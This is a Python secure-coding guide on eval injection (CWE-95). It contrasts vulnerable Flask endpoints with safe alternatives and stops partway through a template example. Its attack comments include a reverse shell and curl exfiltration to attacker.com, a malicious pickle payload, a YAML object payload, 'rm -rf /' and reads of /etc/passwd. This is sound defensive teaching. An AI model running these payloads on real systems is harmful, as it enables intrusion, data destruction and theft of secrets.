CWE-95: Eval Injection - Python
Overview
In Python applications, CWE-95 vulnerabilities occur when untrusted input is passed to dynamic code execution functions like eval(), exec(), compile(), __import__(), or similar constructs. Untrusted input can originate from HTTP requests, external APIs, databases, files, message queues, or any source outside the application's control. Python's dynamic nature makes it particularly susceptible to eval injection because these functions can execute arbitrary Python code with the full privileges of the application.
Primary Defence: Never use eval() or exec() with user input. Instead:
- Use ast.literal_eval() for evaluating Python literals and json.loads() for JSON data (see the sketch below)
- Use a dedicated math expression parser (such as numexpr or simpleeval) rather than eval()
- Load configuration with data-only parsers (YAML with SafeLoader, TOML, JSON) instead of executing Python code
- Avoid pickle for untrusted data; use JSON instead
- Validate all input against strict allowlists to prevent arbitrary code execution
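The first bullet is the most common drop-in fix. A minimal sketch (illustrative, not part of the original guidance) of ast.literal_eval(), which parses Python literals without ever executing code:

# Minimal sketch: ast.literal_eval() as the safe replacement for the
# common "evaluate a literal" use of eval(). It accepts only literal
# syntax (numbers, strings, tuples, lists, dicts, sets, booleans, None)
# and raises ValueError for anything else.
import ast

print(ast.literal_eval("[1, 2, 3]"))   # [1, 2, 3]
print(ast.literal_eval("{'a': 1}"))    # {'a': 1}
try:
    ast.literal_eval("__import__('os').system('whoami')")
except ValueError:
    print("rejected: function calls are not literals")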
Eval injection is especially dangerous in Python because attackers can import modules, access the file system, execute system commands through os.system() or subprocess, manipulate application state, steal environment variables, and even establish reverse shells. Unlike simpler injection vulnerabilities, eval injection gives attackers complete control over the Python interpreter.
Common scenarios include: accepting mathematical expressions and evaluating them with eval(), using exec() to dynamically execute configuration or plugin code, deserializing untrusted data with pickle, using __import__() based on untrusted input, and dynamically constructing code strings from untrusted input. Even seemingly safe uses of eval() with "trusted" input can be exploited through second-order injections or supply chain attacks.
This guidance demonstrates how to eliminate eval injection in Python by replacing dynamic code execution with safe alternatives like AST-based parsing, operator mapping, configuration parsers, and sandboxed execution environments.
Common Vulnerable Patterns
Direct eval() on Untrusted Input
# VULNERABLE - Direct evaluation of untrusted input
from flask import Flask, request, jsonify

app = Flask(__name__)

@app.route('/calculate', methods=['POST'])
def calculate():
    expression = request.json.get('expression')
    # CRITICAL VULNERABILITY - eval executes arbitrary code
    result = eval(expression)
    return jsonify({'result': result})

# Attack examples:
# {"expression": "__import__('os').system('rm -rf /')"}
# {"expression": "__import__('os').popen('cat /etc/passwd').read()"}
# {"expression": "open('/etc/passwd').read()"}
# {"expression": "__import__('subprocess').check_output(['whoami'])"}
# All of these execute with full application privileges!
exec() for Dynamic Code Execution
# VULNERABLE - Using exec() with untrusted code
from flask import Flask, request

app = Flask(__name__)

@app.route('/run-script', methods=['POST'])
def run_script():
    script = request.json.get('script')
    user_context = {}
    # CRITICAL VULNERABILITY - exec runs arbitrary Python code
    exec(script, user_context)
    return {'output': user_context.get('result', 'No result')}

# Attack example:
# {
#     "script": "import os; result = os.popen('ls -la /').read()"
# }
# Attacker gains full file system access!
# More sophisticated attack:
# {
#     "script": """
#         import socket, subprocess, os
#         s = socket.socket()
#         s.connect(('attacker.com', 4444))
#         os.dup2(s.fileno(), 0)
#         os.dup2(s.fileno(), 1)
#         subprocess.call(['/bin/sh', '-i'])
#     """
# }
# Establishes reverse shell to attacker!
Unsafe compile() and Code Objects
# VULNERABLE - Compiling and executing user code
from flask import Flask, request

app = Flask(__name__)

@app.route('/compile-run', methods=['POST'])
def compile_run():
    code_string = request.json.get('code')
    # CRITICAL VULNERABILITY - compile + eval executes arbitrary code
    code_obj = compile(code_string, '<string>', 'eval')
    result = eval(code_obj)
    return {'result': str(result)}

# Attack example:
# {"code": "__import__('os').system('curl http://attacker.com?data=$(env)')"}
# Exfiltrates all environment variables including secrets!
Dynamic Import with __import__()
# VULNERABLE - Dynamic imports based on untrusted input
from flask import Flask, request

app = Flask(__name__)

@app.route('/load-plugin', methods=['POST'])
def load_plugin():
    plugin_name = request.json.get('plugin')
    # CRITICAL VULNERABILITY - arbitrary module import
    module = __import__(plugin_name)
    result = module.execute()
    return {'result': result}

# Attack examples:
# {"plugin": "os"} then access os.system()
# {"plugin": "subprocess"} then execute commands
# {"plugin": "__main__"} then access application internals
# Attacker can import and use any Python module!
Unsafe pickle/yaml Deserialization
# VULNERABLE - Deserializing untrusted data
from flask import Flask, request
import pickle
import yaml

app = Flask(__name__)

@app.route('/load-data', methods=['POST'])
def load_data():
    data = request.data
    # CRITICAL VULNERABILITY - pickle can execute arbitrary code during deserialization
    obj = pickle.loads(data)
    return {'loaded': str(obj)}

# Attack: Craft malicious pickle payload
# import pickle, os
# class Exploit:
#     def __reduce__(self):
#         return (os.system, ('curl http://attacker.com?pwned=1',))
# payload = pickle.dumps(Exploit())
# Sends payload to /load-data endpoint

@app.route('/load-config', methods=['POST'])
def load_config():
    config_yaml = request.data.decode()
    # CRITICAL VULNERABILITY - yaml.load can execute Python code
    config = yaml.load(config_yaml, Loader=yaml.Loader)
    return {'config': config}

# Attack: YAML with Python object constructor
# !!python/object/apply:os.system ['whoami']
# Executes arbitrary system commands!
Format String Injection with str.format()
# VULNERABLE - Format string injection exposing secrets and internals
from flask import Flask, request

app = Flask(__name__)

secret_api_key = "sk-1234567890abcdef"

@app.route('/format-message', methods=['POST'])
def format_message():
    template = request.json.get('template')
    user_name = request.json.get('name', 'User')
    # VULNERABILITY - format fields can traverse attributes and reach globals
    message = template.format(name=user_name)
    return {'message': message}

# Attack examples (attribute traversal works whenever the formatted value
# exposes Python-level attributes, e.g. a function or application object
# rather than a bare str):
# {"template": "{name.__init__.__globals__[secret_api_key]}", "name": ""}
# Accesses global variables including secrets!
#
# {"template": "{name.__class__.__mro__}", "name": ""}
# Enumerates the class hierarchy as a stepping stone to deeper attacks
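As a quick mitigation sketch for this pattern (not from the original text): string.Template only substitutes flat $name placeholders and provides no attribute or index traversal, which removes this gadget surface entirely.

# Mitigation sketch: string.Template substitutes only flat $name
# placeholders - there is no attribute or index traversal to abuse.
from string import Template

print(Template("Hello, $name!").safe_substitute(name="User"))
# -> Hello, User!
print(Template("$name.__class__").safe_substitute(name="x"))
# -> "x.__class__" as plain text: the dot ends the placeholder,
#    so nothing is traversed or executed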
Secure Patterns
AST-based Safe Expression Evaluation
# SECURE - Using AST to safely parse and evaluate math expressions
from flask import Flask, request, jsonify
import ast
import operator

app = Flask(__name__)

class SafeMathEvaluator(ast.NodeVisitor):
    """Safely evaluate mathematical expressions without code execution"""

    # Allowlist of safe operators
    SAFE_OPERATORS = {
        ast.Add: operator.add,
        ast.Sub: operator.sub,
        ast.Mult: operator.mul,
        ast.Div: operator.truediv,
        ast.Pow: operator.pow,
        ast.Mod: operator.mod,
        ast.USub: operator.neg,
        ast.UAdd: operator.pos,
    }

    # Allowlist of safe functions
    SAFE_FUNCTIONS = {
        'abs': abs,
        'min': min,
        'max': max,
        'round': round,
    }

    def eval_expr(self, expr_string: str):
        """Safely evaluate a mathematical expression"""
        try:
            # Parse the expression into an AST
            tree = ast.parse(expr_string, mode='eval')
            return self.visit(tree.body)
        except (SyntaxError, ValueError, TypeError) as e:
            raise ValueError(f"Invalid expression: {e}")

    def visit_BinOp(self, node):
        """Handle binary operations (+, -, *, /, etc.)"""
        if type(node.op) not in self.SAFE_OPERATORS:
            raise ValueError(f"Unsafe operator: {node.op.__class__.__name__}")
        left = self.visit(node.left)
        right = self.visit(node.right)
        op_func = self.SAFE_OPERATORS[type(node.op)]
        return op_func(left, right)

    def visit_UnaryOp(self, node):
        """Handle unary operations (-, +)"""
        if type(node.op) not in self.SAFE_OPERATORS:
            raise ValueError(f"Unsafe operator: {node.op.__class__.__name__}")
        operand = self.visit(node.operand)
        op_func = self.SAFE_OPERATORS[type(node.op)]
        return op_func(operand)

    def visit_Num(self, node):
        """Handle numbers (legacy node type, pre-Python 3.8)"""
        return node.n

    def visit_Constant(self, node):
        """Handle constants (Python 3.8+)"""
        if isinstance(node.value, (int, float)):
            return node.value
        raise ValueError(f"Unsafe constant type: {type(node.value)}")

    def visit_Call(self, node):
        """Handle function calls (only allowlisted functions)"""
        if not isinstance(node.func, ast.Name):
            raise ValueError("Only simple function calls allowed")
        func_name = node.func.id
        if func_name not in self.SAFE_FUNCTIONS:
            raise ValueError(f"Unsafe function: {func_name}")
        if node.keywords:
            # Reject keyword arguments rather than silently dropping them
            raise ValueError("Keyword arguments are not allowed")
        args = [self.visit(arg) for arg in node.args]
        func = self.SAFE_FUNCTIONS[func_name]
        return func(*args)

    def generic_visit(self, node):
        """Reject any AST node types not explicitly allowed"""
        raise ValueError(f"Unsafe expression type: {node.__class__.__name__}")

@app.route('/calculate', methods=['POST'])
def calculate():
    expression = request.json.get('expression')
    if not expression or not isinstance(expression, str):
        return jsonify({'error': 'Invalid expression'}), 400
    # Limit expression length to prevent DoS
    if len(expression) > 200:
        return jsonify({'error': 'Expression too long'}), 400
    try:
        evaluator = SafeMathEvaluator()
        result = evaluator.eval_expr(expression)
        return jsonify({'result': result})
    except ValueError as e:
        return jsonify({'error': str(e)}), 400
    except Exception as e:
        # Log server-side, return generic error
        app.logger.error(f'Calculation error: {e}', exc_info=True)
        return jsonify({'error': 'Calculation failed'}), 500

# Safe to use with expressions like:
# "2 + 2"
# "3 * 4 + 5"
# "abs(-10)"
# "max(1, 2, 3) + min(4, 5)"
# Safely rejects dangerous inputs:
# "__import__('os').system('whoami')" → ValueError: Unsafe expression type
# "eval('malicious code')" → ValueError: Unsafe function
# "exec('print(1)')" → ValueError: Unsafe function
Why This Works
This pattern eliminates eval injection by using Python's Abstract Syntax Tree (AST) module to parse expressions into a structured tree representation that can be safely analyzed. Unlike eval(), which executes whatever code is provided, AST parsing separates the parsing phase from execution, allowing us to inspect the expression structure and reject anything dangerous before evaluation. The SafeMathEvaluator only implements visit methods for safe node types (BinOp, UnaryOp, Num, Constant, Call) - any other node type triggers an error through generic_visit(), making it impossible to execute imports, attribute access, or function definitions.
The security relies on explicit allowlists at multiple levels. The SAFE_OPERATORS dictionary maps AST node types to Python's operator module functions, ensuring only basic arithmetic operations can execute. The SAFE_FUNCTIONS dictionary similarly restricts callable functions to a minimal set of mathematical builtins. When the evaluator encounters a function call, it validates the name against this allowlist before allowing execution. This architecture means attackers cannot access dangerous functions like __import__(), open(), or exec() even if they try to inject them - the AST visitor pattern simply doesn't handle those node types.
Compared to eval() with restricted builtins, this approach is fundamentally more secure because it operates at the syntax level rather than the runtime level. While restricted globals can be escaped through constructor chains and similar techniques (like ().__class__.__bases__[0].__subclasses__()), AST validation rejects these constructs before anything is evaluated. The pattern offers excellent performance since parsing and validation happen in a single pass, and it can be extended with additional safe operators or functions by updating the allowlists. For production use, this is the gold standard for safe expression evaluation in Python.
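A minimal demonstration of the escape mentioned above (a well-documented technique, shown only to illustrate why restricted-builtins eval() is not a security boundary):

# Demonstration: eval() with emptied builtins still permits attribute
# chains from ordinary literals, recovering dangerous objects.
payload = "().__class__.__bases__[0].__subclasses__()"
classes = eval(payload, {"__builtins__": {}}, {})
print(len(classes) > 0)  # True - the full class list, despite the "sandbox"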
Operator Mapping with Explicit Allowlist
# SECURE - Using dictionary mapping instead of dynamic execution
from flask import Flask, request, jsonify
from typing import Callable, Dict, Any

app = Flask(__name__)

class SafeOperationHandler:
    """Handle user-requested operations through explicit mapping"""

    def __init__(self):
        # Explicit allowlist of safe operations
        self.operations: Dict[str, Callable] = {
            'add': self.add,
            'subtract': self.subtract,
            'multiply': self.multiply,
            'divide': self.divide,
            'power': self.power,
        }

    def add(self, a: float, b: float) -> float:
        return a + b

    def subtract(self, a: float, b: float) -> float:
        return a - b

    def multiply(self, a: float, b: float) -> float:
        return a * b

    def divide(self, a: float, b: float) -> float:
        if b == 0:
            raise ValueError("Division by zero")
        return a / b

    def power(self, a: float, b: float) -> float:
        # Limit exponent to prevent DoS
        if abs(b) > 100:
            raise ValueError("Exponent too large")
        return a ** b

    def execute(self, operation: str, a: Any, b: Any) -> float:
        """Execute operation if it's in the allowlist"""
        # Validate operation is allowed
        if operation not in self.operations:
            raise ValueError(f"Invalid operation: {operation}")
        # Validate and convert inputs
        try:
            a_num = float(a)
            b_num = float(b)
        except (ValueError, TypeError):
            raise ValueError("Invalid numeric inputs")
        # Execute the allowlisted operation
        operation_func = self.operations[operation]
        return operation_func(a_num, b_num)

@app.route('/calculate', methods=['POST'])
def calculate():
    data = request.json
    operation = data.get('operation')
    a = data.get('a')
    b = data.get('b')
    try:
        handler = SafeOperationHandler()
        result = handler.execute(operation, a, b)
        return jsonify({'result': result})
    except ValueError as e:
        return jsonify({'error': str(e)}), 400
    except Exception as e:
        app.logger.error(f'Calculation error: {e}', exc_info=True)
        return jsonify({'error': 'Calculation failed'}), 500

# Usage:
# POST /calculate {"operation": "add", "a": 5, "b": 3} → 8
# POST /calculate {"operation": "multiply", "a": 4, "b": 7} → 28
# Safely rejects:
# POST /calculate {"operation": "__import__('os').system('ls')", ...}
# → "Invalid operation" error, no code execution
Why This Works
This pattern prevents eval injection by replacing dynamic code execution with a simple dictionary lookup mechanism. Instead of evaluating user input as Python code, the system treats operation names as dictionary keys that must match predefined entries. The operations dictionary maps string keys to function objects (Python methods), and the execute() method performs a safe lookup without any code interpretation. If an attacker tries to inject code like "__import__('os').system('ls')", it is simply treated as a dictionary key that doesn't exist, causing validation to raise an error.
The type validation ensures all inputs are converted to floats before being passed to operation functions, preventing type confusion attacks. Each operation function implements its own safety checks - the divide function validates the divisor isn't zero, the power function limits exponent magnitude to prevent denial-of-service through enormous computations. This localized validation makes the code easy to audit and maintain, since each operation's security properties are self-contained. The pattern is also highly testable, with each operation function easily unit-tested in isolation.
Compared to eval(), which gives attackers access to the entire Python language including imports, file system access, and network operations, this approach provides exactly the functionality needed and nothing more. The performance is excellent since there's no parsing or compilation overhead - just a dictionary lookup and function call. For applications needing user-selectable operations (calculators, data processing pipelines, configuration-driven workflows), this pattern is ideal. It can be extended with new operations by simply adding dictionary entries, and the type hints let static checkers such as mypy verify the operation implementations.
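As a hedged illustration of that extensibility, the same dispatch-table idea can be built directly on the standard operator module (the names below are illustrative, not part of the example above):

# Illustrative variant: dispatch table built on the operator module.
# Adding an operation is one dictionary entry - never a code string.
import operator
from typing import Callable, Dict

OPERATIONS: Dict[str, Callable[[float, float], float]] = {
    'add': operator.add,
    'subtract': operator.sub,
    'multiply': operator.mul,
    'modulo': operator.mod,  # new operation: just one new entry
}

def run(op_name: str, a: float, b: float) -> float:
    if op_name not in OPERATIONS:
        # Unknown names fail the lookup; they are never parsed as code
        raise ValueError(f"Invalid operation: {op_name}")
    return OPERATIONS[op_name](float(a), float(b))

print(run('modulo', 10, 3))  # 1.0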
Configuration Parsing with Safe Libraries
# SECURE - Using safe configuration parsers instead of exec/eval
from flask import Flask, request, jsonify
import json
import configparser
import yaml
from typing import Dict, Any

app = Flask(__name__)

class SafeConfigLoader:
    """Safely load configuration without code execution"""

    @staticmethod
    def load_json_config(config_string: str) -> Dict[str, Any]:
        """Load JSON configuration (safe, no code execution)"""
        try:
            config = json.loads(config_string)
            # Validate config structure
            if not isinstance(config, dict):
                raise ValueError("Config must be a dictionary")
            # Validate all values are safe types
            SafeConfigLoader._validate_safe_types(config)
            return config
        except json.JSONDecodeError as e:
            raise ValueError(f"Invalid JSON: {e}")

    @staticmethod
    def load_yaml_config(config_string: str) -> Dict[str, Any]:
        """Load YAML configuration with SafeLoader (no code execution)"""
        try:
            # CRITICAL: Use SafeLoader, NOT Loader
            config = yaml.load(config_string, Loader=yaml.SafeLoader)
            # Validate config structure
            if not isinstance(config, dict):
                raise ValueError("Config must be a dictionary")
            # Validate all values are safe types
            SafeConfigLoader._validate_safe_types(config)
            return config
        except yaml.YAMLError as e:
            raise ValueError(f"Invalid YAML: {e}")

    @staticmethod
    def load_ini_config(config_string: str) -> Dict[str, Dict[str, str]]:
        """Load INI configuration (safe, no code execution)"""
        try:
            config = configparser.ConfigParser()
            config.read_string(config_string)
            # Convert to dict
            result = {
                section: dict(config[section])
                for section in config.sections()
            }
            return result
        except configparser.Error as e:
            raise ValueError(f"Invalid INI: {e}")

    @staticmethod
    def _validate_safe_types(obj: Any, depth: int = 0) -> None:
        """Recursively validate only safe types are present"""
        # Prevent deeply nested structures (DoS protection)
        if depth > 10:
            raise ValueError("Configuration too deeply nested")
        # Allowlist of safe types
        safe_types = (str, int, float, bool, type(None))
        if isinstance(obj, dict):
            for key, value in obj.items():
                if not isinstance(key, str):
                    raise ValueError(f"Dict keys must be strings, got {type(key)}")
                SafeConfigLoader._validate_safe_types(value, depth + 1)
        elif isinstance(obj, list):
            for item in obj:
                SafeConfigLoader._validate_safe_types(item, depth + 1)
        elif not isinstance(obj, safe_types):
            raise ValueError(f"Unsafe type in config: {type(obj)}")

@app.route('/load-config', methods=['POST'])
def load_config():
    config_data = request.json.get('config')
    config_format = request.json.get('format', 'json')
    if not config_data or not isinstance(config_data, str):
        return jsonify({'error': 'Invalid config data'}), 400
    # Limit config size to prevent DoS
    if len(config_data) > 1_000_000:  # 1MB limit
        return jsonify({'error': 'Config too large'}), 400
    try:
        loader = SafeConfigLoader()
        if config_format == 'json':
            config = loader.load_json_config(config_data)
        elif config_format == 'yaml':
            config = loader.load_yaml_config(config_data)
        elif config_format == 'ini':
            config = loader.load_ini_config(config_data)
        else:
            return jsonify({'error': 'Invalid format'}), 400
        return jsonify({'config': config})
    except ValueError as e:
        return jsonify({'error': str(e)}), 400
    except Exception as e:
        app.logger.error(f'Config loading error: {e}', exc_info=True)
        return jsonify({'error': 'Failed to load config'}), 500

# Safe configs:
# JSON: {"db_host": "localhost", "port": 5432}
# YAML: |
#   database:
#     host: localhost
#     port: 5432
# Safely rejects dangerous configs:
# YAML with !!python/object: → SafeLoader blocks it
# JSON with executable code: → No way to inject code in JSON
Why This Works
This pattern eliminates code injection during configuration loading by using libraries designed for safe data deserialization. Python's json module is inherently safe because JSON is a pure data format with no mechanism for encoding executable code or Python objects. The yaml.SafeLoader explicitly blocks YAML's dangerous features like arbitrary object instantiation through !!python/object tags, ensuring YAML files can only contain standard data types. ConfigParser similarly only handles key-value pairs as strings, preventing code execution. By validating that the resulting configuration contains only safe primitive types, the code ensures no malicious objects with dangerous __init__ or __del__ methods can be injected.
The recursive type validation provides defense-in-depth by traversing the entire configuration tree and rejecting any unexpected types. Depth limits prevent stack overflow attacks through deeply nested structures, while size limits prevent memory exhaustion. This validation catches edge cases where libraries might allow complex types in specific contexts. The allowlist approach to type validation (only str, int, float, bool, None are allowed) means new attack vectors involving exotic types are automatically blocked.
Compared to using eval() or exec() to load Python code as configuration (a surprisingly common antipattern), this approach provides all the flexibility of structured configuration without code execution risks. JSON is ideal for simple configurations and is cross-language compatible. YAML supports more complex structures and is human-friendly for editing. INI files work well for simple key-value configs. For applications that previously loaded Python config files, migrating to JSON/YAML with validation is straightforward and significantly improves security. Never use pickle or yaml.load() with Loader=yaml.Loader for untrusted config data - these can execute arbitrary code during deserialization.
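The Primary Defence above also lists TOML; a minimal sketch using the standard-library tomllib (Python 3.11+), which, like JSON, is a pure data format with no object-construction hooks:

# Minimal sketch: parsing TOML config with the stdlib tomllib
# (Python 3.11+). TOML cannot encode executable code or objects.
import tomllib

config_string = """
[database]
host = "localhost"
port = 5432
"""
config = tomllib.loads(config_string)
print(config["database"]["port"])  # 5432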
Plugin System with Controlled Imports
# SECURE - Controlled plugin loading with allowlist
from flask import Flask, request, jsonify
import importlib
from typing import Dict, Any, Protocol

app = Flask(__name__)

class PluginInterface(Protocol):
    """Protocol defining the required plugin interface"""

    def execute(self, **kwargs) -> Dict[str, Any]:
        """Execute the plugin with given parameters"""
        ...

class SafePluginLoader:
    """Safely load and execute plugins from allowlist"""

    def __init__(self):
        # Explicit allowlist of approved plugins
        self.allowed_plugins = {
            'data_validator': 'plugins.validators.DataValidator',
            'report_generator': 'plugins.reports.ReportGenerator',
            'email_sender': 'plugins.email.EmailSender',
        }
        # Cache loaded plugins
        self._plugin_cache: Dict[str, PluginInterface] = {}

    def load_plugin(self, plugin_name: str) -> PluginInterface:
        """Load a plugin if it's in the allowlist"""
        # Validate plugin name is in allowlist
        if plugin_name not in self.allowed_plugins:
            raise ValueError(f"Plugin not allowed: {plugin_name}")
        # Check cache
        if plugin_name in self._plugin_cache:
            return self._plugin_cache[plugin_name]
        # Get the full module path from allowlist
        module_path = self.allowed_plugins[plugin_name]
        try:
            # Split module path and class name
            module_name, class_name = module_path.rsplit('.', 1)
            # Import the specific module (not untrusted!)
            module = importlib.import_module(module_name)
            # Get the specific class
            plugin_class = getattr(module, class_name)
            # Instantiate the plugin
            plugin_instance = plugin_class()
            # Validate it implements the interface
            if not hasattr(plugin_instance, 'execute'):
                raise ValueError("Plugin missing required execute method")
            # Cache and return
            self._plugin_cache[plugin_name] = plugin_instance
            return plugin_instance
        except (ImportError, AttributeError) as e:
            raise ValueError(f"Failed to load plugin: {e}")

    def execute_plugin(self, plugin_name: str, **kwargs) -> Dict[str, Any]:
        """Load and execute a plugin safely"""
        plugin = self.load_plugin(plugin_name)
        # Validate parameters
        validated_kwargs = self._validate_parameters(kwargs)
        # Execute plugin
        return plugin.execute(**validated_kwargs)

    @staticmethod
    def _validate_parameters(params: Dict[str, Any]) -> Dict[str, Any]:
        """Validate plugin parameters are safe types"""
        safe_types = (str, int, float, bool, type(None), list, dict)
        validated = {}
        for key, value in params.items():
            if not isinstance(key, str):
                raise ValueError("Parameter keys must be strings")
            if not isinstance(value, safe_types):
                raise ValueError(f"Unsafe parameter type: {type(value)}")
            validated[key] = value
        return validated

@app.route('/run-plugin', methods=['POST'])
def run_plugin():
    plugin_name = request.json.get('plugin')
    parameters = request.json.get('parameters', {})
    if not plugin_name or not isinstance(plugin_name, str):
        return jsonify({'error': 'Invalid plugin name'}), 400
    if not isinstance(parameters, dict):
        return jsonify({'error': 'Parameters must be a dictionary'}), 400
    try:
        loader = SafePluginLoader()
        result = loader.execute_plugin(plugin_name, **parameters)
        return jsonify({'result': result})
    except ValueError as e:
        return jsonify({'error': str(e)}), 400
    except Exception as e:
        app.logger.error(f'Plugin execution error: {e}', exc_info=True)
        return jsonify({'error': 'Plugin execution failed'}), 500

# Usage:
# POST /run-plugin {
#     "plugin": "data_validator",
#     "parameters": {"data": "test"}
# } → Executes plugins.validators.DataValidator
# Safely rejects:
# POST /run-plugin {"plugin": "os.system"} → "Plugin not allowed" error
# POST /run-plugin {"plugin": "__import__"} → "Plugin not allowed" error
Why This Works
This pattern eliminates import-based code injection by strictly controlling which modules can be loaded through an explicit allowlist. Instead of passing user-provided strings to __import__() or importlib.import_module(), the system maps user-facing plugin names to hardcoded module paths that developers have vetted. Attackers cannot import dangerous modules like os, subprocess, or sys because only the plugins explicitly registered in the allowed_plugins dictionary can be imported. The module paths are trusted constants defined at development time, not runtime values from external input.
The interface enforcement through Protocol typing ensures all loaded plugins conform to a known contract with an execute() method signature. Parameter validation restricts plugin inputs to safe primitive types (str, int, float, bool, None, list, dict), preventing object injection, where malicious objects with custom __reduce__ methods could execute code during later serialization or deserialization. Protocol typing enables static checking, while the hasattr check on the loaded instance provides runtime validation. The caching mechanism prevents repeated imports that could trigger module-level code execution multiple times.
Compared to dynamic imports with path sanitization (which can often be bypassed through techniques like null bytes or Unicode normalization), an allowlist approach has no bypass potential - only the predefined modules are accessible. For applications requiring extensibility, this pattern allows adding plugins by updating configuration without changing core code. The Protocol interface (PEP 544) provides structural typing, allowing plugins to be developed independently as long as they implement the required execute() method. This pattern integrates well with modern Python packaging where plugins can be separate packages referenced by name.
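For the packaging-based extensibility mentioned above, a hedged sketch using importlib.metadata entry points (Python 3.10+); the group name "myapp.plugins" is hypothetical:

# Hedged sketch: plugin discovery via packaging entry points
# (Python 3.10+). The group name "myapp.plugins" is hypothetical.
from importlib.metadata import entry_points

def load_registered_plugin(plugin_name: str):
    # Only plugins that installed, vetted packages registered under this
    # group are discoverable - the user-supplied name is a lookup key,
    # never an import path.
    registered = {ep.name: ep for ep in entry_points(group='myapp.plugins')}
    if plugin_name not in registered:
        raise ValueError(f"Plugin not allowed: {plugin_name}")
    plugin_class = registered[plugin_name].load()
    return plugin_class()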
Safe Deserialization Alternatives
# SECURE - Safe alternatives to pickle deserialization
from flask import Flask, request, jsonify
import json
from typing import Any, Dict, Optional
from dataclasses import dataclass, asdict
import yaml

app = Flask(__name__)

@dataclass
class UserData:
    """Type-safe data class for user information"""
    user_id: int
    username: str
    email: str

    @classmethod
    def from_dict(cls, data: Dict[str, Any]) -> 'UserData':
        """Safely construct from dictionary with validation"""
        try:
            return cls(
                user_id=int(data['user_id']),
                username=str(data['username']),
                email=str(data['email'])
            )
        except (KeyError, ValueError, TypeError) as e:
            raise ValueError(f"Invalid user data: {e}")

class SafeSerializer:
    """Safe serialization without code execution risks"""

    @staticmethod
    def serialize_to_json(obj: Any) -> str:
        """Serialize object to JSON (safe)"""
        if hasattr(obj, '__dict__'):
            # Convert to dict
            obj = asdict(obj) if hasattr(obj, '__dataclass_fields__') else obj.__dict__
        return json.dumps(obj)

    @staticmethod
    def deserialize_from_json(data: str, expected_class: Optional[type] = None) -> Any:
        """Deserialize from JSON with optional type validation"""
        try:
            obj = json.loads(data)
            if expected_class:
                # Validate and construct typed object
                if hasattr(expected_class, 'from_dict'):
                    return expected_class.from_dict(obj)
                else:
                    raise ValueError("Class must implement from_dict method")
            return obj
        except json.JSONDecodeError as e:
            raise ValueError(f"Invalid JSON: {e}")

    @staticmethod
    def deserialize_from_yaml_safe(data: str) -> Dict[str, Any]:
        """Deserialize YAML with SafeLoader (no code execution)"""
        try:
            # CRITICAL: SafeLoader, not Loader or UnsafeLoader
            return yaml.load(data, Loader=yaml.SafeLoader)
        except yaml.YAMLError as e:
            raise ValueError(f"Invalid YAML: {e}")

@app.route('/save-user', methods=['POST'])
def save_user():
    """Safely serialize user data"""
    user_data = request.json
    try:
        # Validate and construct typed object
        user = UserData.from_dict(user_data)
        # Serialize to JSON (safe)
        serialized = SafeSerializer.serialize_to_json(user)
        # Store serialized data (e.g., in database)
        return jsonify({'saved': serialized})
    except ValueError as e:
        return jsonify({'error': str(e)}), 400

@app.route('/load-user', methods=['POST'])
def load_user():
    """Safely deserialize user data"""
    serialized_data = request.json.get('data')
    if not serialized_data or not isinstance(serialized_data, str):
        return jsonify({'error': 'Invalid data'}), 400
    try:
        # Deserialize with type validation (safe)
        user = SafeSerializer.deserialize_from_json(
            serialized_data,
            expected_class=UserData
        )
        return jsonify({'user': asdict(user)})
    except ValueError as e:
        return jsonify({'error': str(e)}), 400

# NEVER use pickle for untrusted data:
# pickle.loads(user_input)   # DANGEROUS!
# json.loads(user_input)     # SAFE
# yaml.safe_load(user_input) # SAFE
Why This Works
This pattern eliminates deserialization vulnerabilities by replacing pickle with JSON, which fundamentally cannot encode executable code. Python's pickle module is dangerous with untrusted data because it can trigger arbitrary code execution through __reduce__ methods and similar hooks - attackers can craft serialized objects that execute commands when unpickled. JSON has no such mechanism because it's a pure data format supporting only strings, numbers, booleans, nulls, arrays, and objects. The json module deserializes data by constructing plain Python objects (dict, list, str, etc.) without executing any custom code.
Using dataclasses with explicit from_dict constructors provides type safety and validation. The deserializer only populates the fields defined in the dataclass, and the from_dict method performs explicit type conversion and validation for each field. This prevents polymorphic deserialization attacks where attackers inject unexpected types. The pattern is self-documenting since the dataclass clearly defines what fields are expected and their types. Type hints enable static analysis tools like mypy to catch serialization errors at development time.
For applications that previously used pickle for session storage, caching, or inter-process communication, migrating to JSON is straightforward. JSON is human-readable for debugging, cross-language compatible (unlike pickle which is Python-specific), and has excellent library support. YAML with SafeLoader provides similar security with support for more complex data structures and comments. If you need to preserve object graphs with circular references or custom classes, use libraries like marshmallow or pydantic which provide controlled serialization with validation. Never use pickle.loads() on untrusted data - it's fundamentally unsafe regardless of how carefully you validate the input.
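A hedged sketch of the pydantic route mentioned above (assumes pydantic v2; field names mirror the UserData example):

# Hedged sketch (assumes pydantic v2): schema-validated JSON
# deserialization - invalid or unexpected data raises, and no
# arbitrary objects can be constructed.
from pydantic import BaseModel, ValidationError

class User(BaseModel):
    user_id: int
    username: str
    email: str

raw = '{"user_id": 1, "username": "alice", "email": "a@example.com"}'
try:
    user = User.model_validate_json(raw)
    print(user.username)  # alice
except ValidationError as e:
    print(f"Rejected: {e}")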
Template Rendering with Auto-Escaping
# SECURE - Safe template rendering with Jinja2 auto-escaping
from flask import Flask, request, jsonify
from jinja2 import Environment, select_autoescape, TemplateSyntaxError

app = Flask(__name__)

# Configure Jinja2 with auto-escaping enabled
app.jinja_env.autoescape = select_autoescape(
    enabled_extensions=('html', 'xml', 'jinja2'),
    default_for_string=True,
)

class SafeTemplateRenderer:
    """Safely render templates without code execution"""

    def __init__(self):
        self.env = Environment(
            autoescape=True,
            # Disable dangerous features
            extensions=[],
        )
        # Allowlist of safe filters (replaces the default filter set)
        self.env.filters = {
            'upper': str.upper,
            'lower': str.lower,
            'title': str.title,
            'length': len,
        }

    def render(self, template_string: str, context: dict) -> str:
        """Render untrusted context into a developer-defined template"""
        # Reject any attempt to smuggle template logic in via user input:
        # users provide data, never template syntax
        if any(dangerous in template_string for dangerous in ['{{', '}}', '{%', '%}']):
            raise ValueError("Template string cannot contain Jinja2 syntax")
        # Pre-defined safe template - the only template ever rendered
        safe_template = """
        <div class="message">
            <h2>{{ title }}</h2>
            <p>{{ content }}</p>
            <small>From: {{ author }}</small>
        </div>
        """
        # Validate context
        validated_context = self._validate_context(context)
        try:
            template = self.env.from_string(safe_template)
            return template.render(**validated_context)
        except TemplateSyntaxError as e:
            raise ValueError(f"Template syntax error: {e}")

    @staticmethod
    def _validate_context(context: dict) -> dict:
        """Validate all context values are safe types"""
        safe_types = (str, int, float, bool, type(None))
        validated = {}
        for key, value in context.items():
            if not isinstance(key, str):
